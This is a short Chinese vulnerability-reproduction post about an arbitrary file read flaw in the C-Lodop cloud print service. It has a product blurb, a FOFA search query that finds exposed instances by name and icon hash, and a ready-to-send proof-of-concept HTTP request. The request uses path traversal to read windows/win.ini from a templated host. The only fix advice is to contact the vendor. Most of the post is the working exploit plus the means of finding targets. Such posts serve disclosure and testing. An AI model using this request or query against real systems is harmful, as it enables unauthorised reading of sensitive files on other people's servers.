【漏洞复现】C-Lodop云服务任意文件读取漏洞

 Nx01 产品简介

        泰安梦泰尔软件有限公司经营范围包括：软件开发、信息技术咨询服务、信息系统集成服务、计算机、软件及辅助设备批发等。

Nx02 漏洞描述

        泰安梦泰尔软件有限公司C-Lodop打印服务系统存在文件读取漏洞，攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: "C-Lodop" && icon_hash="-329747115"

Nx04 漏洞复现

POC：

GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Nx05 修复建议

建议联系软件厂商进行处理。